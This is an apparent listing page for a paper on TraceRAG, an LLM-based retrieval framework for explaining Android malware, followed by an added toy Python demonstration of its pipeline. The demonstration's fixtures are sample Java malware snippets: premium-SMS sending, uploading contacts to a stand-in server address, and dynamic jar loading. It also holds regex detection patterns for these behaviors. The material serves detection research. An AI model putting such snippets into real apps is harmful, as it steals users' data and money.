TraceRAG: A LLM-Based Framework for Explainable Android Malware Detection and Behavior Analysis

📅 2025-09-10
📈 Citations: 0
Influential: 0
🤖 AI Summary
To address the challenge of detecting and interpreting stealthy behaviors in Android malware, this paper proposes the first Retrieval-Augmented Generation (RAG) framework tailored for malicious behavior analysis. The framework integrates large language models (LLMs), method-level code summarization, semantic retrieval from a vector database, and multi-turn interactive reasoning, so that natural-language queries can be matched against code semantics and each identified behavior can be traced back to the code that implements it. Its key contribution lies in adapting RAG techniques to Android malware analysis, thereby enabling explainable and traceable identification of malicious behaviors. Experimental evaluation, with ground truth established from updated VirusTotal scans and manual verification, achieves 96.0% accuracy in malware detection and 83.81% accuracy in behavior identification. Expert assessment further confirms that the generated analytical reports are readable and practically useful for real-world security analysis.

📝 Abstract
Sophisticated evasion tactics in malicious Android applications, combined with their intricate behavioral semantics, enable attackers to conceal malicious logic within legitimate functions, underscoring the critical need for robust and in-depth analysis frameworks. However, traditional analysis techniques often fail to recover deeply hidden behaviors or provide human-readable justifications for their decisions. Inspired by advances in large language models (LLMs), we introduce TraceRAG, a retrieval-augmented generation (RAG) framework that bridges natural language queries and Java code to deliver explainable malware detection and analysis. First, TraceRAG generates summaries of method-level code snippets, which are indexed in a vector database. At query time, behavior-focused questions retrieve the most semantically relevant snippets for deeper inspection. Finally, based on the multi-turn analysis results, TraceRAG produces human-readable reports that present the identified malicious behaviors and their corresponding code implementations. Experimental results demonstrate that our method achieves 96% malware detection accuracy and 83.81% behavior identification accuracy based on updated VirusTotal (VT) scans and manual verification. Furthermore, expert evaluation confirms the practical utility of the reports generated by TraceRAG.
Problem

Research questions and friction points this paper is trying to address.

Detecting Android malware with hidden malicious logic
Providing explainable analysis for malware detection decisions
Bridging natural language queries and code for behavior analysis
Innovation

Methods, ideas, or system contributions that make the work stand out.

LLM-based RAG framework for malware analysis
Generates method-level code summaries and indexes them in a vector database
Produces human-readable reports that link each identified behavior to its code implementation
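The pipeline that the abstract and the Innovation list describe (method-level summaries indexed for retrieval, behavior-focused questions that pull back the most relevant snippets, a confirmation step, and a report tracing each behavior to code), as an added example that is not the paper's code. To run offline it substitutes hand-written summaries for the LLM summarizer, a bag-of-words TF-IDF index for the embedding vector database, and a regex check on the retrieved code for the paper's multi-turn LLM confirmation; the decompiled snippets, method names and server address are constructed samples, and the behavior questions are assumptions.

```python
"""Toy TraceRAG-style retrieval: summary -> index -> behavior query -> evidence -> report.

Added example, not the paper's implementation. Stand-ins (assumptions):
- Method.summary is hand-written where the paper uses an LLM summary.
- SummaryIndex is TF-IDF cosine similarity where the paper uses a vector DB.
- The evidence regex replaces the paper's multi-turn LLM confirmation.
"""
import math
import re
from collections import Counter
from dataclasses import dataclass


@dataclass
class Method:
    name: str      # fully qualified method name, kept for provenance tracing
    code: str      # decompiled Java snippet (constructed sample)
    summary: str   # stands in for the LLM-generated method summary


# Constructed decompiled snippets from a hypothetical APK.
METHODS = [
    Method("com.example.app.Billing.charge",
           'SmsManager.getDefault().sendTextMessage("7788", null, "GO", null, null);',
           "Sends an SMS message to a short code number without user interaction."),
    Method("com.example.app.Sync.upload",
           'HttpURLConnection c = (HttpURLConnection) new URL("http://198.51.100.7/c").openConnection(); '
           'c.getOutputStream().write(contacts.getBytes());',
           "Uploads the contact list to a remote server over plain HTTP."),
    Method("com.example.app.Ui.render",
           "textView.setText(getString(R.string.welcome));",
           "Sets a welcome string on a text view."),
    Method("com.example.app.Loader.run",
           'DexClassLoader l = new DexClassLoader(cache + "/p.jar", cache, null, getClassLoader()); '
           'l.loadClass("a.b.C").newInstance();',
           "Dynamically loads and executes code from a jar file in the cache directory."),
]

TOKEN = re.compile(r"[a-z]+")


def tokens(text):
    """Lower-case word tokens; no stemming, so 'send' and 'sends' differ."""
    return TOKEN.findall(text.lower())


class SummaryIndex:
    """Minimal TF-IDF cosine index over method summaries (vector DB stand-in)."""

    def __init__(self, methods):
        self.methods = list(methods)
        docs = [Counter(tokens(m.summary)) for m in self.methods]
        n = len(docs)
        df = Counter()
        for d in docs:
            df.update(d.keys())
        # smoothed idf so a term seen in every summary still has weight 1.0
        self.idf = {t: math.log((1 + n) / (1 + c)) + 1 for t, c in df.items()}
        self.vecs = [self._vec(d) for d in docs]

    def _vec(self, counts):
        v = {t: c * self.idf.get(t, 1.0) for t, c in counts.items()}
        norm = math.sqrt(sum(x * x for x in v.values())) or 1.0
        return {t: x / norm for t, x in v.items()}

    def query(self, question, k=2):
        """Top-k (score, Method) pairs with non-zero similarity to the question."""
        q = self._vec(Counter(tokens(question)))
        scored = [(sum(q[t] * v.get(t, 0.0) for t in q), m)
                  for m, v in zip(self.methods, self.vecs)]
        scored.sort(key=lambda s: s[0], reverse=True)
        return [(s, m) for s, m in scored[:k] if s > 0]


# Behavior-focused questions paired with the API evidence an analyst would expect
# in the retrieved code. The regex is the confirmation stand-in (assumption).
BEHAVIORS = {
    "premium SMS fraud":    ("sends sms message to number", r"sendTextMessage"),
    "contact exfiltration": ("uploads contact list to remote server", r"openConnection"),
    "dynamic code loading": ("loads and executes code from jar file", r"DexClassLoader"),
    "audio recording":      ("records audio from the microphone", r"MediaRecorder"),
}


def analyze(index, behaviors=BEHAVIORS):
    """Return {behavior: [(method name, snippet), ...]} for confirmed behaviors only."""
    report = {}
    for label, (question, evidence) in behaviors.items():
        hits = [m for _, m in index.query(question) if re.search(evidence, m.code)]
        if hits:
            report[label] = [(m.name, m.code) for m in hits]
    return report


def render(report):
    """Human-readable report: each behavior followed by the code that implements it."""
    lines = []
    for label, hits in report.items():
        lines.append(f"## {label}")
        for name, code in hits:
            lines.append(f"- {name}\n    {code}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(analyze(SummaryIndex(METHODS))))
```

Two things the toy makes visible: retrieval alone is not detection, since the "audio recording" question still pulls back two methods through stop-word overlap and is only dropped because no `MediaRecorder` evidence exists in the retrieved code; and keyword matching is brittle (a summary saying "transmits" instead of "uploads" would not be retrieved), which is the gap the paper's semantic embeddings and multi-turn LLM reasoning are meant to close.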